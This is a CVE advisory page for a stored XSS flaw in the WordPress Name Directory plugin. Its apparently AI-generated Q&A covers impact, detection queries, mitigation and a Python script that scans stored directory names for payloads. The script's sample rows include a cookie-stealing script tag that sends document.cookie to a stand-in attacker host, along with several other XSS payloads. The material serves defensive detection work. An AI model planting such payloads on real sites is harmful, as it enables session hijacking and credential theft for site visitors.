CVE-2026-3178
Stored XSS in WordPress Name Directory Plugin Allows Script Injection
Publication date: 2026-03-11
Last updated on: 2026-03-11
Assigner: Wordfence
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-3178 is a Stored Cross-Site Scripting (XSS) vulnerability in the Name Directory plugin for WordPress. It occurs via the 'name_directory_name' parameter in all versions up to and including 1.32.1 due to insufficient input sanitization and output escaping. This flaw allows unauthenticated attackers to inject arbitrary web scripts into pages, which execute whenever a user accesses the injected page.

The vulnerability was partially patched in versions 1.30.3 and 1.32.1, and fully addressed in version 1.33.0 by improving input sanitization, output escaping, nonce verification, and permission checks in the plugin's admin and database handling components. [1, 2, 3]
How can this vulnerability impact me?
This vulnerability can allow unauthenticated attackers to inject malicious scripts into the plugin's pages, which will execute in the context of users visiting those pages. This can lead to theft of user credentials, session hijacking, defacement, or redirection to malicious sites.
Because the vulnerability is exploitable without authentication and affects all users who access the injected pages, it poses a significant security risk to website visitors and administrators.
The CVSS v3.1 base score of 7.2 reflects high severity: network attack vector, low attack complexity, no privileges required, no user interaction, low confidentiality and integrity impact and no availability impact, with scope changed because the injected script runs in the browser of whoever views the page rather than inside the plugin itself. Taken together, those metrics and the 7.2 score correspond to the vector AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability is a Stored Cross-Site Scripting (XSS) flaw reachable through the 'name_directory_name' parameter in Name Directory plugin versions up to and including 1.32.1. Detection has two parts: confirming whether the installed plugin version is affected, and checking whether a payload has already been stored in the directory entries that the plugin renders.
Because the root cause is missing input sanitization and output escaping, any payload an attacker submitted is sitting in the database as a directory name. It is found by inspecting the stored names, not the plugin's PHP files (those only show the defect, not whether it was exploited).
Suggested commands or steps include:
- Check the installed version of the Name Directory plugin; anything at or below 1.32.1 is affected, and 1.30.3 and 1.32.1 carry only a partial fix.
- Use a web application scanner or manual inspection of the pages that display directory names, looking for script tags, inline event handlers (onerror=, onload=) and javascript: URLs.
- On the server, search a database export, or query the database directly, for HTML or JavaScript in the stored 'name_directory_name' values. The plugin's table and column names vary by version, so confirm them first by listing the tables whose names contain name_directory.
- Example command to check the plugin version via WP-CLI: `wp plugin list --format=table | grep name-directory`
- Example SQL query to find suspicious scripts in the database (table and column names are illustrative; adjust them to your schema): `SELECT * FROM wp_name_directory_names WHERE name_directory_name LIKE '%<script>%' OR name_directory_name LIKE '%javascript:%';` A match on '<script>' alone misses payloads such as `<img src=x onerror=...>` or `<svg onload=...>`, so widen the query to every value containing a '<' (`OR name_directory_name LIKE '%<%'`) and review the hits by hand. Run this check after updating as well: the plugin update does not remove entries stored before it was applied.
What immediate steps should I take to mitigate this vulnerability?
The primary mitigation step is to update the Name Directory plugin to version 1.33.0 or later, which includes the security fix for CVE-2026-3178.

The update improves input sanitization, output escaping, nonce verification, and permission checks to prevent unauthorized script injection and privilege escalation.

If immediate updating is not possible, consider temporarily disabling the plugin or restricting access to the affected functionality to trusted users only.

Additionally, review and sanitize any existing entries in the directory that might contain malicious scripts, since the update does not remove payloads that were stored before it was applied.

- Update the Name Directory plugin to version 1.33.0 or later.
- Restrict access to the plugin's administrative interface using WordPress capability checks or other access control mechanisms.
- Sanitize existing directory entries to remove any injected scripts.
- Monitor your site for suspicious activity or unexpected script execution. [1, 2, 3]
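The two checks above (searching the stored directory names for payloads, then sanitizing what is found) as one script, added here as an example; it is not code from the plugin, from Wordfence, or from the CVE entry. The names in it are assumptions: the advisory identifies only the 'name_directory_name' request parameter, so the export query in the docstring, the `wp_name_directory_name` table and the `name` column are illustrative stand-ins, and the sample rows are constructed. The script goes beyond the LIKE '%<script>%' query by also catching inline event handlers, javascript: URLs, active tags such as img/svg/iframe, and entity-encoded variants that become live markup once decoded; `safe_render` shows the output the plugin should produce (the same encoding WordPress's esc_html() applies).

```python
"""Flag stored-XSS payloads in Name Directory entries and show the escaped form.

Added example for this CVE entry; it is not the plugin's code or Wordfence's.
Assumption: rows are (id, name) tuples exported from the plugin's own table.
The advisory names only the 'name_directory_name' request parameter, not the
schema, so the export query below is illustrative and must be adapted:

    wp db query "SELECT id, name FROM wp_name_directory_name" --skip-column-names
"""
import html
import re

# A plain LIKE '%<script>%' misses most real payloads; check the common vectors.
SUSPICIOUS = [
    ("script_tag",     re.compile(r"<\s*script\b", re.I)),
    ("event_handler",  re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript_url", re.compile(r"javascript\s*:", re.I)),
    ("data_html_url",  re.compile(r"data\s*:\s*text/html", re.I)),
    ("active_tag",     re.compile(r"<\s*(iframe|object|embed|svg|img|math|meta|link|base|form)\b", re.I)),
]


def classify(value):
    """Return the names of every pattern matching the raw value or its
    HTML-entity-decoded form. An entry stored as '&lt;svg onload=...&gt;'
    becomes live markup if the plugin decodes it before output."""
    candidates = {value, html.unescape(value)}
    return [name for name, rx in SUSPICIOUS if any(rx.search(c) for c in candidates)]


def safe_render(value):
    """What the plugin should emit: every HTML metacharacter entity-encoded,
    the same effect as WordPress's esc_html()."""
    return html.escape(value, quote=True)


def scan_rows(rows):
    """Return one finding per row that matches at least one pattern."""
    findings = []
    for row_id, name in rows:
        hits = classify(name)
        if hits:
            findings.append({"id": row_id, "name": name,
                             "hits": hits, "escaped": safe_render(name)})
    return findings


# Constructed sample rows, standing in for the wp db query output above.
SAMPLE_ROWS = [
    (1, "Alice Johnson"),
    (2, "Bob <script>new Image().src='https://attacker.invalid/?c='+document.cookie</script>"),
    (3, "Carol <img src=x onerror=alert(document.domain)>"),
    (4, "Dave &lt;svg onload=alert(1)&gt;"),       # entity-encoded, live once decoded
    (5, "O'Brien & Sons"),                          # legitimate, must not be flagged
    (6, 'Eve <a href="javascript:alert(1)">site</a>'),
]

if __name__ == "__main__":
    for f in scan_rows(SAMPLE_ROWS):
        print(f"id={f['id']} hits={','.join(f['hits'])}")
        print(f"   stored : {f['name']}")
        print(f"   escaped: {f['escaped']}")
```

Replace `SAMPLE_ROWS` with the tuples from your own export (adjust the `wp_` prefix if the site uses another one) and review every hit by hand: names containing an ampersand or apostrophe are not flagged, but an entry that trips `active_tag` may still be markup the site owner entered on purpose. Anything confirmed malicious should be replaced in the database with its `safe_render` form or deleted, then the page re-checked after the plugin is updated.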